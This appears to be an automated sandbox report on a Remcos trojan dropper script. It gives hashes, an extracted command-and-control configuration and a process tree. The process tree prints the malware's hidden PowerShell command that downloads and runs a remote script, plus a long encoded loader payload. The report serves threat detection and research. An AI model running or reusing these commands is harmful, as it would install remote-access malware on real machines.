Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
03-12-2024 22:47
Static task
static1
Behavioral task
behavioral1
Sample
ETL3M_remcos.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
ETL3M_remcos.vbs
Resource
win10v2004-20241007-en
General
-
Target
ETL3M_remcos.vbs
-
Size
563KB
-
MD5
f7c17bfb4247e64e22dd52540a4b903b
-
SHA1
368ba4d02df294fa42efee5e4f330d5e7260d0c3
-
SHA256
23ca901cd7f4f0ca6b2a652c7467911756241a02e37ebf60c6c09c6224478622
-
SHA512
5f79d697ba68f6d285d56b8f38587774eb95162be0af3080a14ea9e277b0b33e3c20c8ccd74c6dddcc06eff3aed36b2c5bb096a8b92101c6f27d2603dfb136a4
-
SSDEEP
12288:eQO27ODRJ7gfddv13rIJQ9HmFboRCuo52CDm09LghGmQ3DnIE2YgdhhC:eN27a7mMJQl2Ac4CDdg8mQPGhhC
Malware Config
Extracted
remcos
RemoteHost
41.216.183.218:56792
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-I5RS8V
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
Remcos
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exeflow pid Process 5 1036 powershell.exe 43 4804 powershell.exe 45 4804 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1400 powershell.exe 1020 powershell.exe 3856 powershell.exe 4104 powershell.exe 428 powershell.exe 1036 powershell.exe 3060 powershell.exe -
.NET Reactor proctector 1 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Processes:
resource yara_rule behavioral2/memory/4804-214-0x0000000004F20000-0x0000000004F76000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc Process File opened for modification C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
powershell.exepowershell.execmd.exepowershell.execmd.execmd.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid Process 2256 timeout.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid Process 4808 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid Process 1036 powershell.exe 1036 powershell.exe 3060 powershell.exe 3060 powershell.exe 1400 powershell.exe 1400 powershell.exe 3932 powershell.exe 3932 powershell.exe 1020 powershell.exe 1020 powershell.exe 2964 powershell.exe 2964 powershell.exe 3856 powershell.exe 3856 powershell.exe 4804 powershell.exe 4804 powershell.exe 4104 powershell.exe 4104 powershell.exe 764 powershell.exe 764 powershell.exe 428 powershell.exe 428 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid Process Token: SeDebugPrivilege 1036 powershell.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 1400 powershell.exe Token: SeDebugPrivilege 4808 taskkill.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeDebugPrivilege 1020 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeIncreaseQuotaPrivilege 2964 powershell.exe Token: SeSecurityPrivilege 2964 powershell.exe Token: SeTakeOwnershipPrivilege 2964 powershell.exe Token: SeLoadDriverPrivilege 2964 powershell.exe Token: SeSystemProfilePrivilege 2964 powershell.exe Token: SeSystemtimePrivilege 2964 powershell.exe Token: SeProfSingleProcessPrivilege 2964 powershell.exe Token: SeIncBasePriorityPrivilege 2964 powershell.exe Token: SeCreatePagefilePrivilege 2964 powershell.exe Token: SeBackupPrivilege 2964 powershell.exe Token: SeRestorePrivilege 2964 powershell.exe Token: SeShutdownPrivilege 2964 powershell.exe Token: SeDebugPrivilege 2964 powershell.exe Token: SeSystemEnvironmentPrivilege 2964 powershell.exe Token: SeRemoteShutdownPrivilege 2964 powershell.exe Token: SeUndockPrivilege 2964 powershell.exe Token: SeManageVolumePrivilege 2964 powershell.exe Token: 33 2964 powershell.exe Token: 34 2964 powershell.exe Token: 35 2964 powershell.exe Token: 36 2964 powershell.exe Token: SeDebugPrivilege 3856 powershell.exe Token: SeIncreaseQuotaPrivilege 3856 powershell.exe Token: SeSecurityPrivilege 3856 powershell.exe Token: SeTakeOwnershipPrivilege 3856 powershell.exe Token: SeLoadDriverPrivilege 3856 powershell.exe Token: SeSystemProfilePrivilege 3856 powershell.exe Token: SeSystemtimePrivilege 3856 powershell.exe Token: SeProfSingleProcessPrivilege 3856 powershell.exe Token: SeIncBasePriorityPrivilege 3856 powershell.exe Token: SeCreatePagefilePrivilege 3856 powershell.exe Token: SeBackupPrivilege 3856 powershell.exe Token: SeRestorePrivilege 3856 powershell.exe Token: SeShutdownPrivilege 3856 powershell.exe Token: SeDebugPrivilege 3856 powershell.exe Token: SeSystemEnvironmentPrivilege 3856 powershell.exe Token: SeRemoteShutdownPrivilege 3856 powershell.exe Token: SeUndockPrivilege 3856 powershell.exe Token: SeManageVolumePrivilege 3856 powershell.exe Token: 33 3856 powershell.exe Token: 34 3856 powershell.exe Token: 35 3856 powershell.exe Token: 36 3856 powershell.exe Token: SeIncreaseQuotaPrivilege 3856 powershell.exe Token: SeSecurityPrivilege 3856 powershell.exe Token: SeTakeOwnershipPrivilege 3856 powershell.exe Token: SeLoadDriverPrivilege 3856 powershell.exe Token: SeSystemProfilePrivilege 3856 powershell.exe Token: SeSystemtimePrivilege 3856 powershell.exe Token: SeProfSingleProcessPrivilege 3856 powershell.exe Token: SeIncBasePriorityPrivilege 3856 powershell.exe Token: SeCreatePagefilePrivilege 3856 powershell.exe Token: SeBackupPrivilege 3856 powershell.exe Token: SeRestorePrivilege 3856 powershell.exe Token: SeShutdownPrivilege 3856 powershell.exe Token: SeDebugPrivilege 3856 powershell.exe Token: SeSystemEnvironmentPrivilege 3856 powershell.exe -
Suspicious use of WriteProcessMemory 51 IoCs
Processes:
WScript.exepowershell.exepowershell.execsc.execmd.execmd.exepowershell.execmd.execmd.exepowershell.exedescription pid Process procid_target PID 1064 wrote to memory of 1036 1064 WScript.exe 82 PID 1064 wrote to memory of 1036 1064 WScript.exe 82 PID 1036 wrote to memory of 3060 1036 powershell.exe 84 PID 1036 wrote to memory of 3060 1036 powershell.exe 84 PID 3060 wrote to memory of 1992 3060 powershell.exe 86 PID 3060 wrote to memory of 1992 3060 powershell.exe 86 PID 1992 wrote to memory of 3188 1992 csc.exe 87 PID 1992 wrote to memory of 3188 1992 csc.exe 87 PID 3060 wrote to memory of 1652 3060 powershell.exe 88 PID 3060 wrote to memory of 1652 3060 powershell.exe 88 PID 1064 wrote to memory of 4256 1064 WScript.exe 102 PID 1064 wrote to memory of 4256 1064 WScript.exe 102 PID 4256 wrote to memory of 852 4256 cmd.exe 104 PID 4256 wrote to memory of 852 4256 cmd.exe 104 PID 852 wrote to memory of 4868 852 cmd.exe 106 PID 852 wrote to memory of 4868 852 cmd.exe 106 PID 852 wrote to memory of 3932 852 cmd.exe 107 PID 852 wrote to memory of 3932 852 cmd.exe 107 PID 852 wrote to memory of 3932 852 cmd.exe 107 PID 3932 wrote to memory of 1020 3932 powershell.exe 108 PID 3932 wrote to memory of 1020 3932 powershell.exe 108 PID 3932 wrote to memory of 1020 3932 powershell.exe 108 PID 3932 wrote to memory of 2964 3932 powershell.exe 109 PID 3932 wrote to memory of 2964 3932 powershell.exe 109 PID 3932 wrote to memory of 2964 3932 powershell.exe 109 PID 3932 wrote to memory of 3856 3932 powershell.exe 112 PID 3932 wrote to memory of 3856 3932 powershell.exe 112 PID 3932 wrote to memory of 3856 3932 powershell.exe 112 PID 3932 wrote to memory of 4120 3932 powershell.exe 114 PID 3932 wrote to memory of 4120 3932 powershell.exe 114 PID 3932 wrote to memory of 4120 3932 powershell.exe 114 PID 4120 wrote to memory of 2916 4120 cmd.exe 116 PID 4120 wrote to memory of 2916 4120 cmd.exe 116 PID 4120 wrote to memory of 2916 4120 cmd.exe 116 PID 2916 wrote to memory of 1568 2916 cmd.exe 118 PID 2916 wrote to memory of 1568 2916 cmd.exe 118 PID 2916 wrote to memory of 1568 2916 cmd.exe 118 PID 2916 wrote to memory of 4804 2916 cmd.exe 119 PID 2916 wrote to memory of 4804 2916 cmd.exe 119 PID 2916 wrote to memory of 4804 2916 cmd.exe 119 PID 4804 wrote to memory of 4104 4804 powershell.exe 120 PID 4804 wrote to memory of 4104 4804 powershell.exe 120 PID 4804 wrote to memory of 4104 4804 powershell.exe 120 PID 852 wrote to memory of 2256 852 cmd.exe 121 PID 852 wrote to memory of 2256 852 cmd.exe 121 PID 4804 wrote to memory of 764 4804 powershell.exe 122 PID 4804 wrote to memory of 764 4804 powershell.exe 122 PID 4804 wrote to memory of 764 4804 powershell.exe 122 PID 4804 wrote to memory of 428 4804 powershell.exe 124 PID 4804 wrote to memory of 428 4804 powershell.exe 124 PID 4804 wrote to memory of 428 4804 powershell.exe 124
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ETL3M_remcos.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1064 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command "iex (iwr -Uri 'https://raw.githubusercontent.com/latencyx0/EmptyBuilder/refs/heads/main/remcos.ps1' -UseBasicParsing)"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -encodedCommand CgAgACAAIAAgACQAbgBtAGcAYgBLAGMAWQBIACAAPQAgADkANQAxADUACgAgACAAIAAgACQAbABiAEwARQBuAEUAQwBIACAAPQAgACgAWwBNAGEAdABoAF0AOgA6AFMAcQByAHQAKAAkAHMARwBoAGsATwBUAGkAYgApACAAKgAgADEAMQApAC4AVABvAFMAdAByAGkAbgBnACgAKQAKACAAIAAgACAAJABmAGwARwBrAHgAUQBxAEsAIAA9ACAAIgBmACIACgAgACAAIAAgACQASgByAEoAVQBZAGMAdgBnACAAPQAgACIAZAAiAAoAIAAgACAAIAAkAHgAcgBlAFYARQBXAEMAeAAgAD0AIAAiAE4AIgAKACAAIAAgACAAJABhAE4AeQBBAG4AUwByAFIAIAA9ACAAIgBHACIACgAgACAAIAAgACQAZABpAHUAZQB0AEwAQQByACAAPQAgACIAZAAiAAoAIAAgACAAIAAkAG4AbgBpAG8ARQB0AFMAcgAgAD0AIAAiAEoAIgAKACAAIAAgACAAJABEAGkATwB0AFIAYgBIAEYAIAA9ACAAIgBTACIACgAgACAAIAAgACQATQBwAHUAawB3AFAAVQBqACAAPQAgACIARwAiAAoAIAAgACAAIAAkAE8AZQBrAE4AWQBlAGUAWgAgAD0AIAAiAGMAIgAKACAAIAAgACAAJABoAGsAegBJAHgATABHAGwAIAA9ACAAIgBCACIACgAgACAAIAAgACQASwBhAGkAcwBZAFYAdABOACAAPQAgACIAMwAiAAoAIAAgACAAIAAkAEoAQgB3AFoAWgBvAHcAbQAgAD0AIAAiAFoAIgAKACAAIAAgACAAJABFAGcATwBtAHEASgB6AFEAIAA9ACAAIgBpACIACgAgACAAIAAgACQAaQBBAHAAVQB4AHIAagBwACAAPQAgACIAYwAiAAoAIAAgACAAIAAkAEwAZgBvAHMAUQBMAG0AWQAgAD0AIAAiAE0AIgAKACAAIAAgACAAJABwAHQAcABmAEcAYQBaAEQAIAA9ACAAIgA5ACIACgAgACAAIAAgACQAdAAxACAAPQAgADYANAAgACsAIAA1ADYACgAgACAAIAAgACQAdAAyACAAPQAgACgAJAB0ADEAIAAqACAANgApACAALQAgACgAJAB0ADEAIAAvACAANwApAAoAIAAgACAAIAAkAHQAMwAgAD0AIAAiAGYAIgAgACsAIAAiAGQAIgAgACsAIAAiAE4AIgAgACsAIAAiAEcAIgAgACsAIAAiAGQAIgAKACAAIAAgACAAJAB0ADQAIAA9ACAAIgBKACIAIAArACAAIgBTACIAIAArACAAIgBHACIAIAArACAAIgBjACIAIAArACAAIgBCACIACgAgACAAIAAgACQAdAA1ACAAPQAgACIAMwAiACAAKwAgACIAWgAiACAAKwAgACIAaQAiACAAKwAgACIAYwAiACAAKwAgACIATQAiACAAKwAgACIAOQAiAAoAIAAgACAAIAAkAHAAIAA9ACAAJAB0ADMAIAArACAAJAB0ADQAIAArACAAJAB0ADUACgAgACAAIAAgACQAYQAgAD0AIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcAApAAoAIAAgACAAIAAkAGQAIAA9ACAAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAiAFEAVgBRAFYAQQBUAGQAeABFAGYARgBWAHMAVAAzAEoATgBYAEwAZAA0AGcAVwBNACsAVABBAG8ARQBaAGIAcQA1AGYAdgBLAEMANgB4AHoAUgBzAHcAQwAwADkAZgArAFIAMwBuADUANQA2ADkAUQAyAHUAaAA3AFEAdwBhAHMAUABJAGcAMQBPAGsAQwBnAFEAdwBKAE0AZABFAHEAWQBEADcAWQBzAFYAaAAwAGcAbABhAHQANwB4AFUARgBPAEsAWgBwADkAQgBkAHAAdgBFAHcAbgBKAFMAaABPAE0AVwBpADAAdgB3AHUAagBBAGcAdgA0AEQATwArAFkAWQBmAGIATABRAGkAOQBMAGMAaQBiAE4ANQB2AGcAUQBjAEQAMABJAFIAdAA1ADYAQQB3AEoAQwBUADgAdgA4AFcAdABoADgAaQB0AFMAegArAFYAawBIADYARAA4AEEARgByADkAWQBxAG0AKwBwAE8ASwB1AGMAVgArAGMASgByAEUANwAxAEsAMABlAHkAawAyAEUAZABPAEgAYQB6AFAAdABJAEUAZgArAHEAdgBKAGkASwBqAGcARABFAEYARwBvACsAbQBLAHIAVQB6ADIAawBMAGgAMQBWAHMAawBTAG8AdABSAEgAYgBaAC8AVAB2AEsARABJAHUAOABYAHgARwArAHEARQB1AFIAMgBVAGEAVgA4AEwATQBzAHoATgByAEMAZABWAFcAUQBLAHkAKwAwAEsAagBlAFMANwBBADIANAB1AEIAYgBjAHcASAA3AGMAKwAvAEcAOABEAGQAYwBpAEIATgArAE4AWgBxAHAAWAA1AFQAZwBjAGkAcwA1ADQAagBXAEwASwBQAEUAWQBKAFIATQB5ADMAbQBVAFkAbgBEAEcAWQA3AEsAcABIAG8ANgBOAGIANwBsADAANQBqAHAAaQBCAGEAbQAzAHYAeQBQAGMAeABqAEkAVgBIADUARgBmAEMAMwBhAGYAUAB3ADIAYgA3AEwAeAB6AEsAWABMAFUASABuAC8ATABPAHEAdwBJAEwAZABqAHkAdAB4AEYAUABwAGYAbQBCAHAASQBoAGMAZwBrAE0AbQBDADMAWgA0AGMAZgB3AE0AMABrADUAdwBFAGQAWgBQADUAYwBQAE0AMQArADIARQBvAFIAQgBuAGMAegB1AGoAegBHAEYAWQAwAEYAQwBhAGIAawBaAEUAbgBWAGYAagA1AGUAOABQAEQAYgAyAE0ASgBJAGkAQgBUAGgAVwBTAGIAWgBWADUAcQA4AG4ALwBnAGoAQQBxAC8AbwA5AG4AeQA5AE8ASQBWAFAAQwBEAGQAcwBzAGoANQBjAHkAQQBzAHQAUwBZAFIASgBuAGsASgA1ADkAcgBzAGYAMgBBAFoAbQBpAFEAOQBmAHQAMQBhAGQASQBDADkAbQBXAE4AZQBYADgASQA0AFAAVgA4AFUAZAB4AFAAVwB2AHUAWgBYADUARQBlAEQATQBuAFEAMwA2AGwAbABTAGUAYwBJAFQAWABRAFIAQwBVAHUAMQBNAGUAdgB1AGYAMgBZAFYAYQBXAHQAQwBXADgATQBIAG4AcABmAGwANAA1AEgARAB0AEYAUwBMAHYAeQAxAFoAVQBwADIAZgBXAEYAcwB5AEoAZgAvAFoAZgBLADgARwBPAE4ATQBOAG4ARwB4AEQAcQAyADYAVQBGAC8AMABuAFcAQgBTAGYAZABDADUAZABQAFcAMAA0AHIASgBOAFEATgBWAGcAZABTAEsAbgA4AEkAQwBUAGwAeQBVADMATQBNADIALwB0AGoAUQB5AEIAQwBLAE0ARwBYAG0ANABrAFEAcQByADYANwBPAEgAbgBRAEEASABIAHEAUQAwAHgAMgBaADYAMQBGADQAMgBqAFYAZQBWAHQAbgBjAGoAYwA3AFAAMgBrAGEASwBjAG8AVQBlAEkAegBKAEYAWABTAFMAdQBHAHoAbwBmAHIAegBHADEAegBiAFoAOQA1AHIAdQA2AGwANwBQAHIAZABOADUAMgBpAE4AbABGACsASwBBAFAARgBJAGsARAB3AFEAUgB2AEEAUQBqAHMAMgBTADkAbQBIADEAMgBKAEQAawBCAEkAbwBwAGIAdwBMAHoAZwAwAHgAMQBXAHkAVABsAHEANABpAE4AcwB3AEoAWAB5AEsAcQBvAFEAZABYAFkAVwB4AG8AQQBzADUARQBYADkATwB5AEEAQQA3AGQASgB5ADIAQQBvAHoARgBmAG0AawBhAFUAMABNAHYASgAvADIANAA5AEUAUQB5AHUAeABtAEkAdgBjADEAQQBpAFYAbgBNADgAYgBLAG8ARABKAHIANgB3ACsAUQBsAG8AegBPAGYAKwBQAEgAVwBmAHEAVABoAFIAbgAzAFoAbgB1AFMATABRAGEANgBJADMAWQBpAGsAaQA0AEwASQBqAGsAcQB4ADUANwBMAGEAZwA1ADQAagBpAGsATQBTAHUAOAByAEUAbQBhADQAegBvAHgAdgBrAFMANgBjAEQAMABHAFAAQwBhADEAagBnAFMARQBxAEoANABGAGMASwAwAFMAKwAvAE0AVwA3AHcAVgBOAHUARABDAGQAWQAwAGsAbQBrAEEAcQB4AEMAMABnADgAMwBjAEMAOQBqAFAATQBhAGYARQBtADcAdABSAGMAMwBRAEEAegBGAFQAYQBmADAAdgByAFUAbgBBACsAcgBGAG0AWQBnAHUAawBDAEMAcwBhADUAZABPAHEARABDADkAUgBBAGwAYgBRAE0AZgBHAFIAVwBTAHgARABvACsARQA4ADgAUgA5ADgARQA0AEMAVgBXADYAawBLAHUARgBxAGwAegB4AEUARABGAG8AQgBFAHkAUwAwAHMAUAAyAGkAcAA1AHAARwBFAEoAOQBVAHMAQwBqAEYAbgBZAFYASABnAEwANABCADIATABWAGUALwB0AHcAdQB5AEQAbwBBAHkAeQBFAHMAVABHAGwAVQB4ACsAMwA0AEwAZwBvAHkAZgBFAEMAcwBzAFkAegBrAFkANQA0AEIAUQBoAEoASQBQAHUAYQAxAGEAawBGAEYANwBhADMAQgBGAEMAYgBqAHQAcgBqAHMATAA3AG8AUQB0AFMAYQBvAHgAdQBVAHUAVgByAFQAKwBzAHkAWgBZAE0AWgBtAFcARQBCADYASABaAGcAVwBFADQASQBLAEoANABOAEkASQBmADYAegBXAFUARABPAHEASwBEAFkAdgA2ADgAZwBnAFMAcQBtAHQANAA1AGUAMwBZADkANABCADAAKwBOAEIAVABRAGkAUQBYADIAZAB4AGkALwBCAFYAcABMAHcAcQBxAGIAcQBTAEIAYwBjAGcAYwBjAEsARwA0AHkAdABmAHYANwBtACsAcgBuAHcAbwBVAHAAUwBZADgAUABoAHAAWAAvADAAKwBuAEcAWABIAHkASwA0AHAAUwBJAFIAaABHADIARgBaADMAKwBUAHQAUwBIAFEARABJAFkAcwBTADEAZQBSAGQAbABuAG8AbABFADMAZQBaAHoAcwBvAFQAVgA3AE4AWQBwAHAAVABBAFIATQBjAE8ANwBuAFUAVgAvADkATwAvADkAbgBrAFkANgB3AGgAWgB3AGMAdABBAE4AbgBUAFUAeQBhAHAAZABPADMALwBkAC8AaQBHADUAVgBnAEsAWgBEAFcAWQA4AFQANwBQAGkAVgBQAFAAVQBqAFEANwBVAFYAbwBjAGIAOABoADUAWgBjAE0ASgAzADEAMgBSAC8ARwArAEgAVwAyAFoAdAA3AGIAWABHAGYAagB6AHkATgBIAEkAeQAxAHIAWQB5AGoAUgBaAFcAcQA0AHEAZABWAGoAcwBJAFAAbABQAFkAMQBzAFoAdQBXAEUAVQBvADkAVwBzAC8AQQBwAEEARgB5AFkAeAAwAGgAdQA1ADIAegBHAHYANgBXADAAUAAyAEoASgAxAG0ANABjAE8AeABQAC8AcQBNAEQAdABPADQAOAAyAHgAdQBjAEkAcgBqAEEATgBKAGcAQwBBAFQAUgBuAEYAWABSAGgAQgBTAEoANgBqAC8ANQBqADkANAB6ACsAVABnAFgAbABDAHkAdQBDAE4AMQBBAE8AUQA0AFEAegBOAFoAdwB3AEgAWABDAEEAZwBuAEwASgBXAEEAVABFAHcAbwBKAGsASQA3AHAAUQBTAFQAQQBOADIAaAArAHgASABUAGUARABFAEoAcABmADQAMQBqADIAVgBCAEoAegBIAEkAcQBtAEEAMwBUAHAAbwBPAEkAcwBJAEYAdwA3AHMALwB1AHMAeQBXAGsAawBOAHEARwBDAFQAYgBDAHkAZgBGADIAbgBSAFMAZABQAHAAQQA3AEQASQBpAEEAeAB4ADAAMABrADEAWQBxAE0AUwByAEUAUwBnAGoAQQBuAHAAUgBvADIAcQBOAGgAWgA3AHQAUgA1AEsAWQBlAGUAaQBEADIAOABqAGEARwAwAGsAKwBLAGsANgBHAHkAOABtAHYANgBqAEwAMgB0AHAAUwB0AFYAdgA3AEYAMwBWAGMASAA5AHYAQwBCAG0AdABSAG0AdwBmAFkANABUAEMAUABtAGYAaAB0AGQAaABrAEcAVwBBAGwARQBZAFYAUQAvAHQAdABIAGMAcQA2AHYAdgBpAEUAYwBqAG8AMQA5AFIAZAA4AHQARABiAGYAbwBEAHkASgBsAEIAZwBRAEcAYwBjAGsAUwBDAG0AWABCAFMAdQBhAFEAUQBjAEsAcgBDAHUAQgBsAC8AbgBaAEUAcQBNAHMAWQBSAEkAUQBZADkAdQB6AGUAMQBNAHEANwBiAGYATQBGAFUASgBwAGIAYQBtADEAZAB3AGEANQBHAGcAUQBtAGMAVgBiAEoALwB1AHUATwB3AHgAZwA3AHcAUQBnACsAcQBBAHIALwBKADUAegA0AGQAVgBSAGcAMQBHADgAdABuAHkAcwAwAG0AagBkAGkAYwBEADAATQBTAHAAeQA3AFcAMgBLAGQAQwB4AEkAeABlAGkASQB5AFQAZgBJAHUAWABsAFMAOQBaAFUAOQBOADEAaQBxADQAZQB0AFMAOQAxAGIAdABsACsAWQBvAEwAbwBBACsAQgBZAHUASABqAGMAZgBvAEwAbABkAHMAMABQAFgAawBNAHoAMgAvAGMAeABBAGYAUABaAFkAMwA2AEEASgB5AFAAVQBLADMANQBrAGkAWABqAC8AagAyAEoARQBZAEoAQQBmADkATwBsAGIATQBsADUAbwBUAGYAYQAvAGsAMABrAHMAQwBXAFEANgArAGEANwArAFMARQBGAHIAagBDADAAcgBMADgAKwBIAHYAZQBwAFEARwBFADcAdQBSAGUAWgBzAFEAQwBZADYAZgB6AEoAbABQAEIAbwBGAFUALwBnAC8AcQBRAGsAawBkAFoAYQBDAGcAcgBzAE4AbgBTAE4AeQBnAFEASABrADUAagBiAHEAWQBSAGEAUQB3AG0AWABqAHcASwBVAEQANwA0AHAAegBKADAAZABWAEMAVABJAGsARgBlAG4ARAAzAHIAVQB4AFUATwAyADAAQQBVAGcAcgB3AFoARABuADUAQwBnAG0AbABIAFkAeABhAEsAMgA1AEgAMwBhAGkAdQBSAEwASgBBAEsAUQB6AG4ATABDADUAWABXAEwAQQBDAFQAWABDAGkAOABrAE0ANQBuADcALwB5ADgAagBkAGoAcABlAGIARgB6AHYAWABhACsARgBrAHcAMQArAFQAUgBPADUAUQBRACsARgAyAHgAYwBUAEEANABTAGIAbQArAEMANAB4AFIAbgBNAGYAbQBGAEQATABHAE4ASgBMAG4AawAvAGYATwBJAGEANgBKAEoAZwBmAG8AZQBpAFAAZABNAEsAbgAyAFQAaQBxAFEANAB3AGUARgBvAFUARwBmADcAcwB3AG8AYwBOAFEASgBjADgAdAB1ADIAKwB6AE8AUwBkADQAZQBZAEoAYwBNAEEAcwBxAE0AdQBuAHYAcABCAEcATwBYAGcAaQBOAEoAbgBDADgAaQA0AE8AVQBDAGwASwA5AGEAVQBoAEYAVgBCAEEAMQBTADgAdABUAEkAYwBJAGgATgBoAHMATABRAFMAVABaAG4AUgBZAC8AYwB1AHoAKwBvAHgASwA1AHUASQBGAFIAdQBpAHoAMQBKAFEARwBFADkAOABmAHgAWQB5AEsAbgB3AGQAdQBVAGYAWABLAGcATAAzAFgAaABiADQAbQBIAEwANQB3ADYAWABqADYAawAyAE0AWgBNAGkASAB0AFoANQBIAGsARwBXAHIANwA2AEYAZABHADAAWQBQADkASwBFAGkAUQA0AHQAVgBEAFEAKwAyAHEAdwA1AGMAZwBoADQAeQBhAHUAaABhAHQANgBPAFMAMABmAFcAZABKAGMAUwBSAFMASgBOAFAANgBuADEARAAyAFYAVABMAFEAbQA1AEwASQBaAEUAQwBkAHAAQQArAG8AcABIAHEAbwA3AC8AKwBBAHUAUgBLAE0AVwBIAGMATwBLAGcAdwBLAHUAbgBOAFoAMQB4AEEAeAA2AGMARwBZAHoAVQA5AHkAcABUAGEAeQBzAHoAZwBQAEwAaAB3AE0ANABSAGEANQA0ADEAOQAwAG4ANQBwAHAAaQBDAHkAYQBzAGoAdABQAGEASwB4ADAAcwAwAEEAcABjAGQAMgAyAHMAbQA0AHcAWgAxADcARQBCAGMASQBwAHIASgB4ADAARwB4AFoAMwBUAGsARgBxADIAcAArAFEAQwAzADMARwBDADMAQgAxAGEATQBhAE8AQQBPADMAbgB2AC8AbQBuAGgAWABPAGkAQwA0AGoAaQByAGIAbgBsAHEAZgBlAGsARQBRADAASwB4AFUAWABVAHUAaAAvAGoALwBJAGEAagBsAEcAYwB6AFYAaQBKAHIAMwAxAGIAaABxAEEAdgBOAFQAVAA5AFEATABFADAAdwBoAFoAYwByAFgAOAAxACsAbwBnAEoASQBEAFIANQB0AFAAUABnAGoAMABrAGoATQBnAGgAKwBnADAAOQBLAHAAWgBvADkAUABpAEcAOABqAG0ASgBuAGIAWABvAEgASgBUAEQAbABnAG0ATwBuAEMAVgBXAGwAeQBMAHgAcQBGAEUAaAAyAGQAagB2AEoAaQBvAE4AZABWAEYAZQBzAG8AawAwAEQAWgBGACsAZwBUAG0AWgBoAGQAbwAzAHMATwBxAGQAcgBVAHcAeQBQAGEAUwA4AE0ALwBPAGcATABaAGkARAA2AFoAcgA4AFkAbgBHAGcATQBMAEcANQBsAEYAMABBADMAcABzAEkAZgByAE4AYQBGADUAKwBYAFIANQBLAGYAKwA4ADUAbgBpADEASgB4ADIAQgBPAEkASAArADEASQBSAHcAYgBhADYAbQBkADgARwBUADkASQBlAHkAOABLAEcAZABwAHIAUQBxAEoAbwA4ADYAVgBYAEIATAA0ADQAMwB0ADMAQgBUAGYASQA5AEYAcgBKAHoANABYAC8AeABsAG8AWAB4AHMASwBrAFcARABlADQALwBSADYAagArAEMAWQB3AGIAUABMAG0AVwA5AGsASgBxAFAAQwByAGoAMgBlAG8AMQBk